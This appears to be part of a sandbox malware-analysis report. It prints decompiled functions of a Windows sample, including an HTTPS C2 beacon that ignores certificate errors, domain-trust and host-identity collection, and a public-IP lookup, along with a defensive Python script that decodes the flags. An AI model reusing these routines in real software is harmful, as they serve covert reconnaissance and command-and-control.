					if(_v100 == 3 || _v100 == 4) { // only INTERNET_SCHEME_HTTP / INTERNET_SCHEME_HTTPS are handled
						_v32 = E006124D0(); // InternetOpenA wrapper (see APIs below): IE11/Trident User-Agent
						if(_v32 != 0) {
							_v16 = _v88; // nPort
							_v20 = 0x84080100; // INTERNET_FLAG_RELOAD | NO_CACHE_WRITE | NO_COOKIES | PRAGMA_NOCACHE
							if(_v100 == 4) {
								_v20 = _v20 | 0x00803000; // INTERNET_FLAG_SECURE | IGNORE_CERT_CN_INVALID | IGNORE_CERT_DATE_INVALID
							}
							_v12 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0); // 3 = INTERNET_SERVICE_HTTP
							if(_v12 != 0) {
								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x617048, _v20, 0); // 0x617048 = lplpszAcceptTypes
								if(_v8 != 0) {
									if(_v100 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40); // 0x1f = INTERNET_OPTION_SECURITY_FLAGS
										_v24 = _v24 | 0x00001100; // SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID
										InternetSetOptionA(_v8, 0x1f,  &_v24, 4); // any certificate is accepted on the HTTPS C2 channel
									}
									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
									_v48 = _t90;
									_v28 = 0;
									if(_v48 == 1) {
										_v52 = 4;
										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0); // HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER
										if(_v28 == 0xc8 && _a12 != 0) { // 0xc8 = HTTP 200; _a12 = caller's response buffer
											_t100 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed; single read of at most _a16-1 bytes, longer bodies are truncated
											if(_t100 == 0 ||  *_a20 <= 0) {
												 *_a20 = 0;
											} else {
												 *((char*)(_a12 +  *_a20)) = 0; // NUL-terminate the response
											}
										}
									}
									InternetCloseHandle(_v8); // executed
									InternetCloseHandle(_v12);
									if(_v28 != 0xc8) { // success only on HTTP 200
										return 0;
									} else {
										return 1;
									}
								}
								InternetCloseHandle(_v12);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}

Offsets: 0x006128c1 .. 0x00612b0c (per-line address column of the listing above)

                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 006128FC
                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0061292F
                                                                                                                                                      • Part of subcall function 006124D0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 006124E9
                                                                                                                                                    • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00612944
                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 006129C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$lstrlen$ConnectCrackOpen
                                                                                                                                                    • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                    • API String ID: 4167639401-2842678110
                                                                                                                                                    • Opcode ID: fb1fdccd18486ed226863064cfbf76313a2010a39868e904e36803eaba31f412
                                                                                                                                                    • Instruction ID: cb8f8d85d95178864d907d6a15017bb4287ad667fc08137cc106685f4345a5d2
                                                                                                                                                    • Opcode Fuzzy Hash: fb1fdccd18486ed226863064cfbf76313a2010a39868e904e36803eaba31f412
                                                                                                                                                    • Instruction Fuzzy Hash: 46717F71A0420AEFDF10CFA5DC59BEEB7B6FB48705F148529E605AB280D7749A84CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
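
The flag words in the listing above (0x84080100, 0x00803000, 0x1f, 0x00001100, 0x20000013) are what a triage analyst has to decode by hand to see that the sample disables certificate validation on its HTTPS C2 channel. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It scans a decompiled listing like the one above for HttpOpenRequestA and InternetSetOptionA(INTERNET_OPTION_SECURITY_FLAGS) calls, resolves the flag variables, decodes them with the constant values from wininet.h, and reports certificate-validation bypasses. The embedded listing excerpt is copied from the function above. Design choice: every literal assigned or OR'ed into a variable is unioned across branches, so bits that are only set on the HTTPS path still show up in the report.

```python
"""Decode WinINet flag words in a decompiled listing (added example, not report code)."""
from __future__ import annotations
import re

# Values from wininet.h; the decompiler above shows them only as raw hex.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
CERT_BYPASS = {n for n in (*INTERNET_FLAGS.values(), *SECURITY_FLAGS.values()) if "IGNORE" in n}

# Excerpt copied from the decompiled function above: the lines that set and consume the flag words.
SAMPLE_LISTING = """
_v20 = 0x84080100;
if(_v100 == 4) {
    _v20 = _v20 | 0x00803000;
}
_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x617048, _v20, 0);
InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
_v24 = _v24 | 0x00001100;
InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
"""

ASSIGN = re.compile(r"(_v\d+)\s*=\s*(?:\1\s*\|\s*)?(0x[0-9a-fA-F]+)\s*;")
CALL = re.compile(r"\b(HttpOpenRequestA|InternetSetOptionA)\s*\(([^()]*)\)")


def decode_flags(value: int, table: dict[int, str]) -> list[str]:
    """Split a flag word into symbolic names, high bit first; unknown bits stay as hex."""
    names = []
    for bit, name in sorted(table.items(), reverse=True):
        if value & bit:
            names.append(name)
            value &= ~bit
    if value:
        names.append(f"0x{value:08x}")
    return names


def split_args(argtext: str) -> list[str]:
    """Split a C argument list on commas that sit outside string literals."""
    args, cur, in_str = [], "", False
    for ch in argtext:
        if ch == '"':
            in_str = not in_str
        if ch == "," and not in_str:
            args.append(cur.strip())
            cur = ""
        else:
            cur += ch
    args.append(cur.strip())
    return args


def collect_flag_vars(listing: str) -> dict[str, int]:
    """OR every literal assigned or OR'ed into each _vN (all-paths over-approximation)."""
    bits: dict[str, int] = {}
    for var, lit in ASSIGN.findall(listing):
        bits[var] = bits.get(var, 0) | int(lit, 16)
    return bits


def resolve(arg: str, bits: dict[str, int]) -> int | None:
    """Turn a call argument (hex literal, decimal literal, _vN or &_vN) into an int."""
    arg = arg.lstrip("&").strip()
    if arg.lower().startswith("0x"):
        return int(arg, 16)
    if arg.isdigit():
        return int(arg)
    return bits.get(arg)


def analyze(listing: str) -> dict[str, list[str]]:
    """Decode HttpOpenRequestA dwFlags and the INTERNET_OPTION_SECURITY_FLAGS value, then flag bypasses."""
    bits = collect_flag_vars(listing)
    report: dict[str, list[str]] = {"request_flags": [], "security_flags": [], "findings": []}
    for api, argtext in CALL.findall(listing):
        args = split_args(argtext)
        if api == "HttpOpenRequestA" and len(args) >= 7:
            val = resolve(args[6], bits)  # dwFlags is the 7th parameter
            if val is not None:
                report["request_flags"] = decode_flags(val, INTERNET_FLAGS)
        elif api == "InternetSetOptionA" and len(args) >= 3:
            if resolve(args[1], bits) == INTERNET_OPTION_SECURITY_FLAGS:
                val = resolve(args[2], bits)  # lpBuffer points at the DWORD being set
                if val is not None:
                    report["security_flags"] = decode_flags(val, SECURITY_FLAGS)
    bypass = sorted(CERT_BYPASS.intersection(report["request_flags"] + report["security_flags"]))
    if bypass:
        report["findings"].append("TLS certificate validation weakened: " + ", ".join(bypass))
    if {"INTERNET_FLAG_NO_CACHE_WRITE", "INTERNET_FLAG_NO_COOKIES"} <= set(report["request_flags"]):
        report["findings"].append("Request leaves no WinINet cache or cookie artifacts on disk")
    return report
```

Running `analyze(SAMPLE_LISTING)` on the excerpt reports INTERNET_FLAG_SECURE together with both IGNORE_CERT flags on the request and SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID on the handle, which is why a self-signed or mismatched certificate on the C2 host is accepted; the NO_CACHE_WRITE | NO_COOKIES finding is the forensic caveat that the beacon will not appear in the user's INetCache. The regexes assume one call per line and no nested parentheses inside the call, which holds for decompiler output of this shape.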

                                                                                                                                                    C-Code - Quality: 100%
			E00612FE0(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				union _TOKEN_INFORMATION_CLASS _v28; // used as the success flag, despite the decompiler's type guess
				union _SID_NAME_USE _v32;
				int _t31;
				int _t37;
				int _t43;

				_v12 = OpenProcess(0x400, 0, _a4); // 0x400 = PROCESS_QUERY_INFORMATION on PID _a4
				if(_v12 != 0) {
					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) { // 0x20008 = TOKEN_QUERY | READ_CONTROL
						_v8 = 0;
						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed; 1 = TokenUser, sizing call only
						if(_t31 != 0 || GetLastError() != 0x7a) { // 0x7a = ERROR_INSUFFICIENT_BUFFER is the expected result here
							return 0;
						} else {
							_v24 = E00611390(_v8); // heap allocation helper (inferred from usage)
							_v20 = _v24;
							_v28 = 0;
							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed; fills a TOKEN_USER structure
							if(_t37 != 0) {
								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed; TOKEN_USER.User.Sid -> account name (_a8) and domain (_a16) of the process owner
								if(_t43 != 0) {
									_v28 = 1;
								}
							}
							E006113D0(_v24); // matching free helper (inferred from usage)
							return _v28; // the process and token handles are not closed on this path
						}
                                                                                                                                                    					}
                                                                                                                                                    					return 0;
                                                                                                                                                    				}
                                                                                                                                                    				return 0;
                                                                                                                                                    			}













                                                                                                                                                    0x00612ff7
                                                                                                                                                    0x00612ffe
                                                                                                                                                    0x0061301c
                                                                                                                                                    0x00613025
                                                                                                                                                    0x0061303a
                                                                                                                                                    0x00613042
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613053
                                                                                                                                                    0x0061305f
                                                                                                                                                    0x00613065
                                                                                                                                                    0x00613068
                                                                                                                                                    0x00613081
                                                                                                                                                    0x00613089
                                                                                                                                                    0x006130a7
                                                                                                                                                    0x006130af
                                                                                                                                                    0x006130b1
                                                                                                                                                    0x006130b1
                                                                                                                                                    0x006130af
                                                                                                                                                    0x006130bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006130c4
                                                                                                                                                    0x00613042
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061301e
                                                                                                                                                    0x00000000

APIs
• OpenProcess.KERNEL32(00000400,00000000,?,?,00612E25,?,?,00000104,?,00000104), ref: 00612FF1
• OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,00612E25,?,?,00000104), ref: 00613014
Strings
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: OpenProcess$Token
• String ID: %.a
• API String ID: 2935449343-4034201083
• Opcode ID: 3e8860c1ea01317c07ba9b1d5f94b01de447a61380a2e079a42776e1bb3d4461
• Instruction ID: bbd6688c178436ac21ea0342a5d8ee6ad7bd202498100b067915efad4c90b4b8
• Opcode Fuzzy Hash: 3e8860c1ea01317c07ba9b1d5f94b01de447a61380a2e079a42776e1bb3d4461
• Instruction Fuzzy Hash: 6D3101B5A00209AFDB00DFA5DC85FEE77BAAB4C705F148558F606E7280DB71AB44CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(00000007,0000300B,006A9A58,006B12B4,006B12B0,006A9A28,?), ref: 0066ACAB
Strings
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ProtectVirtual
• String ID: $$$$$$$$C
• API String ID: 544645111-3650051871
• Opcode ID: 85d35a718f0852dbf5e17c526674b9b43a0aa1b1810d6021e7df9e85c21c2de5
• Instruction ID: f12942a11c102aa42824af0fd03222416770e5bee756a0f0ba77f6d73c0c9e66
• Opcode Fuzzy Hash: 85d35a718f0852dbf5e17c526674b9b43a0aa1b1810d6021e7df9e85c21c2de5
• Instruction Fuzzy Hash: 65E17B78905104EFC708EFADD9D09AABBF3FB46304F28925EC5055B36AD234AA41DF61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
            E006123A0(CHAR* _a4) {
                signed int _v8;
                char _v12;
                char _v16;
                char* _t30;
                signed int _t26; // used below; declaration missing from the decompiler output

0x006123b1      *_a4 = 0;
0x006123b5      _t30 =  &_v16;
0x006123c1      __imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12, _t30); // executed
0x006123c9      if(_t30 == 0) {
0x006123d6          if(_v16 != 0) {
0x006123e2              _v8 = 0;
0x006123f4              while(_v8 < _v16) {
0x00612407                  if( *(_v12 + _v8 * 0x2c) != 0) {
0x00612418                      lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
0x00612427                      lstrcatA(_a4, ";");
0x00612427                  }
0x00612439                  if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) {
0x00612442                      _t26 = 4 + _v8 * 0x2c; // 0xff25f845
0x0061244b                      lstrcatA(_a4,  *(_v12 + _t26));
0x0061245a                      lstrcatA(_a4, ";");
0x0061245a                  }
0x006123f1                  _v8 = _v8 + 1;
0x006123f1              }
0x00000000              return 1;
0x00612462          }
0x00000000          return 1;
0x006123d8      }
0x00000000      return 0;
            }

APIs
• DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00611AC8,?,?,00611AC8,?,?,?), ref: 006123C1
Strings
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: DomainEnumerateTrusts
• String ID: p
• API String ID: 4051863571-2821316953
• Opcode ID: e4f68060491eb5223338abc62bf54bfb3c9ac516fde68a8114f1094a4eb8bf1e
• Instruction ID: 7360993f87ccc442008e9f15d6c43f4d22ca7ce0b1689ac640eaf989567514b5
• Opcode Fuzzy Hash: e4f68060491eb5223338abc62bf54bfb3c9ac516fde68a8114f1094a4eb8bf1e
• Instruction Fuzzy Hash: A0214F31A00209FBCB08CFA4D995FEDBBB6FB48301F1491A9E5059B290D774AED1DB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(000007E9,006B0470), ref: 006698A5
Strings
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: PathTemp
• String ID: j$;$U$n
• API String ID: 2920410445-27418773
• Opcode ID: 0b5eeb45c3c136bd7719c3ccc35ae02809194643d164b930f7155fe8cd6a8ca4
• Instruction ID: b3b5ee127e6d8f2b02c5f0980eb7527b444b0d9a4f4f39dc22904b8f682b06b3
• Opcode Fuzzy Hash: 0b5eeb45c3c136bd7719c3ccc35ae02809194643d164b930f7155fe8cd6a8ca4
• Instruction Fuzzy Hash: 1CC26A756093918FC304DF29D8901AABBE6BBAA314F18592FF495C7351E338E845CF62
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___security_init_cookie.LIBCMT ref: 0062ACB0
  • Part of subcall function 0062B89A: ___get_entropy.LIBCMT ref: 0062B8B4
  • Part of subcall function 0062B055: ___isa_available_init.LIBCMT ref: 0062B065
• ___scrt_release_startup_lock.LIBCMT ref: 0062AD4C
• ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0062AD60
• ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0062AD86
• ___scrt_uninitialize_crt.LIBCMT ref: 0062ADC9
• ___scrt_fastfail.LIBCMT ref: 0062AE22
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ___scrt_is_nonwritable_in_current_image$___get_entropy___isa_available_init___scrt_fastfail___scrt_release_startup_lock___scrt_uninitialize_crt___security_init_cookie
• String ID:
• API String ID: 1682875030-0
• Opcode ID: 8cb549842deec6978cad8d426e1e5d4a5f185610647a1b8b935396daa2da70ae
• Instruction ID: b04049c0503d4214a29e4ab88b2f8e3b2f692ff5f19ef159c3a703ff78901522
• Opcode Fuzzy Hash: 8cb549842deec6978cad8d426e1e5d4a5f185610647a1b8b935396daa2da70ae
• Instruction Fuzzy Hash: 06312431544E229BCBA47BF0B812BAD27639F42721F24151EF0806B6D3CFA148419E5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
E00612500(void* __ecx, CHAR* _a4) {
	char _v8;
	void* _t10;

	if( *0x00617278 == 0) {
		_t10 = E00611FC0("http://api.ipify.org", "185.189.150.70", 0x20,  &_v8); // executed
		if(_t10 != 1) {
			 *((char*)(0x617278)) = 0;
			lstrcpyA(_a4, "0.0.0.0");
			return 0;
		}
		 *((char*)(_v8 + 0x617278)) = 0;
		lstrcpyA(_a4, "185.189.150.70");
		return 1;
	}
	lstrcpyA(_a4, "185.189.150.70");
	return 1;
}

APIs
• lstrcpyA.KERNEL32(00611AB9,185.189.150.70,?,?,00611AB9,?,?), ref: 00612520
• lstrcpyA.KERNEL32(00611AB9,185.189.150.70,?,?,00611AB9,?,?), ref: 0061255D
Strings
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: lstrcpy
• String ID: 0.0.0.0$185.189.150.70$http://api.ipify.org
• API String ID: 3722407311-3193360669
• Opcode ID: eabff7db5d6762ab58153f4344ddc57e452939d90d394f60d27cdd2021995f64
• Instruction ID: c3c4c78d52894864d3defbcc675b3ba39cc5929174e6ad1cda1ca485a838319d
• Opcode Fuzzy Hash: eabff7db5d6762ab58153f4344ddc57e452939d90d394f60d27cdd2021995f64
• Instruction Fuzzy Hash: C4012634748201A7EB048B78CDAABE93BABD729300F1C4254FA059F381C9F5DAC68740
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E00612F10(char _a4, CHAR* _a8) {
	int _v8;
	void* _v12;
	CHAR* _v16;
	void* _v20;
	char _v280;
	void* _t29;
	void* _t48;

	_t1 =  &_a4; // 0x612de3
	_t29 = OpenProcess(0x400, 0,  *_t1);
	_v12 = _t29;
	if(_v12 == 0) {
		L12:
		return 0;
	}
	_push(0x104);
	_push( &_v280);
	_push(_v12); // executed
	L00613BC3(); // executed
	_v20 = _t29;
	FindCloseChangeNotification(_v12); // executed
	if(_v20 <= 0) {
		goto L12;
	}
	_v16 = 0;
	_v8 = 0;
	while(_v8 < _v20) {
		if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
			_v16 = _t48 + _v8 - 0x113;
		}
		if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
			_v8 = _v8 + 1;
			continue;
		} else {
			break;
		}
	}
	if(_v16 == 0) {
		goto L12;
	}
	lstrcpyA(_a8, _v16);
	return 1;
}

APIs
• OpenProcess.KERNEL32(00000400,00000000,-a), ref: 00612F24
• K32GetProcessImageFileNameA.KERNEL32(00000000,?,00000104), ref: 00612F47
• FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,00000104), ref: 00612F53
• lstrcpyA.KERNEL32(00000000,00000000), ref: 00612FBE
Strings
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: Process$ChangeCloseFileFindImageNameNotificationOpenlstrcpy
• String ID: -a
• API String ID: 1999166229-4272857021
• Opcode ID: b6f7d735d83d3e74eb75490b3008c13244bed794a3e81d2686aad1bb38f28190
• Instruction ID: 27f039d74afce2555b7e2cf0819eeab5d27b2b0c66ff9158c9556d8ea0d0cda4
• Opcode Fuzzy Hash: b6f7d735d83d3e74eb75490b3008c13244bed794a3e81d2686aad1bb38f28190
• Instruction Fuzzy Hash: 2A216770E0410DEFCB14CF98C9A4BEDB7B6BB08701F2484A9E616A7280D7745A92DF50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E006130D0(CHAR* _a4) {
	long _v8;
	char _v268;
	char _v528;
	int _t14;
	void* _t16;

	 *_a4 = 0;
	_v8 = 0x104;
	_t14 = GetComputerNameA( &_v268,  &_v8);
	_t31 = _t14;
	if(_t14 != 0) {
		lstrcatA(_a4,  &_v268);
	}
	lstrcatA(_a4, " @ ");
	_t16 = E00612DD0(_t31,  &_v528); // executed
	if(_t16 != 0) {
		lstrcatA(_a4,  &_v528);
	}
	return 1;
}

                                                                                                                                                    APIs
                                                                                                                                                    • GetComputerNameA.KERNEL32 ref: 006130FA
                                                                                                                                                    • lstrcatA.KERNEL32(00100000,?), ref: 0061310F
                                                                                                                                                    • lstrcatA.KERNEL32(00100000, @ ), ref: 0061311E
                                                                                                                                                    • lstrcatA.KERNEL32(00100000,?), ref: 00613142
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$ComputerName
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 2583549208-203157567
                                                                                                                                                    • Opcode ID: 653fd899bb22fabb628ae20909ecdbacdfde5cde206577dd04c7bb512d389161
                                                                                                                                                    • Instruction ID: 958b08338a71518b36d4a42bb6edd0bf0a910d13254053cfe28c6fa50a45eab7
                                                                                                                                                    • Opcode Fuzzy Hash: 653fd899bb22fabb628ae20909ecdbacdfde5cde206577dd04c7bb512d389161
                                                                                                                                                    • Instruction Fuzzy Hash: EF0186B5500308ABDB14DFA5DC49BDA7B7AAB48301F0481A9FA0A87251DB75DBC4CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 85%
			E00612E70(char _a4) {
				signed int _v8;
				char _v12;        // bytes returned by K32EnumProcesses
				unsigned int _v16; // number of PIDs returned (_v12 / 4)
				char _v276;       // image name of the process being examined
				char _v4372;      // 0x1000-byte PID array filled by K32EnumProcesses
				signed int _t23;
				void* _t26;
				int _t29;
				void* _t40;
				void* _t41;
				char* _t1;        // decompiler temporaries; the original listing used them without declarations
				signed int* _t3;
				char* _t15;

				// Enumerates running processes and returns the PID of the one whose image name
				// matches _a4 (called with "explorer.exe"), or -1 if none matches.
				E00611420(0x1110);
				_t1 =  &_v12; // 0x612de3
				_t23 = _t1;
				_push(_t23);
				_push(0x1000);
				_push( &_v4372); // executed
				L00613BBD(); // executed, K32EnumProcesses import thunk (ref 00612E8D)
				if(_t23 != 0) {
					_t3 =  &_v12; // 0x612de3
					_v16 =  *_t3 >> 2;
					_v8 = 0;
					while(_v8 < _v16) {
						// E00612F10 resolves the image name of PID _v4372[_v8] into _v276
						_t26 = E00612F10( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
						_t41 = _t41 + 8;
						if(_t26 == 0) {
							L8:
							_t23 = _v8 + 1;
							_v8 = _t23;
							continue;
						}
						_t15 =  &_a4; // 0x612de3
						_t29 = lstrcmpiA( &_v276,  *_t15); // executed, case-insensitive name comparison
						if(_t29 != 0) {
							goto L8;
						}
						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)); // matching PID
					}
					return _t23 | 0xffffffff;
				}
				return _t23 | 0xffffffff;
			}

                                                                                                                                                    APIs
                                                                                                                                                    • K32EnumProcesses.KERNEL32(?,00001000,-a,?,00612DE3,explorer.exe), ref: 00612E8D
                                                                                                                                                    • lstrcmpiA.KERNEL32(?,-a,?,?,00612DE3), ref: 00612EE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumProcesseslstrcmpi
                                                                                                                                                    • String ID: -a$-a
                                                                                                                                                    • API String ID: 1246086236-4070510245
                                                                                                                                                    • Opcode ID: 5230e7c4336aae0ee573e4c5f19d88874751ae7a794ad4d531472d75597ee08a
                                                                                                                                                    • Instruction ID: b58189bb78c98feb3f7ec35f38615bb98f719e40e3ddcad362808e31c58a9fa6
                                                                                                                                                    • Opcode Fuzzy Hash: 5230e7c4336aae0ee573e4c5f19d88874751ae7a794ad4d531472d75597ee08a
                                                                                                                                                    • Instruction Fuzzy Hash: 0D115270D00109EBCB14CF98D851AEDB7BABF48344F18459DF62597280E734AED09B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
			E00612DD0(void* __eflags, CHAR* _a4) {
				long _v8;
				long _v12;
				long _v16;        // PID of explorer.exe
				char _v276;       // directory part of the explorer.exe path
				char _v536;       // file name part of the explorer.exe path
				long _t16;
				void* _t20;

				// Resolves the full path of the running explorer.exe into _a4 as "<dir>\<name>".
				_t16 = E00612E70("explorer.exe"); // executed, PID lookup via K32EnumProcesses
				_v16 = _t16;
				_v12 = 0x104;
				_v8 = 0x104;
				 *_a4 = 0;
				// E00612FE0 opens the process (OpenProcess, ref 00612FF1) and fills directory and file name
				_t20 = E00612FE0(_v16,  &_v536, _v12,  &_v276, _v8); // executed
				if(_t20 == 0) {
					return 0;
				}
				lstrcpyA(_a4,  &_v276);
				lstrcatA(_a4, "\\");
				lstrcatA(_a4,  &_v536);
				return 1;
			}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00612E70: K32EnumProcesses.KERNEL32(?,00001000,-a,?,00612DE3,explorer.exe), ref: 00612E8D
                                                                                                                                                      • Part of subcall function 00612FE0: OpenProcess.KERNEL32(00000400,00000000,?,?,00612E25,?,?,00000104,?,00000104), ref: 00612FF1
                                                                                                                                                    • lstrcpyA.KERNEL32(00000104,?), ref: 00612E37
                                                                                                                                                    • lstrcatA.KERNEL32(00000104,006142B8), ref: 00612E46
                                                                                                                                                    • lstrcatA.KERNEL32(00000104,?), ref: 00612E57
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
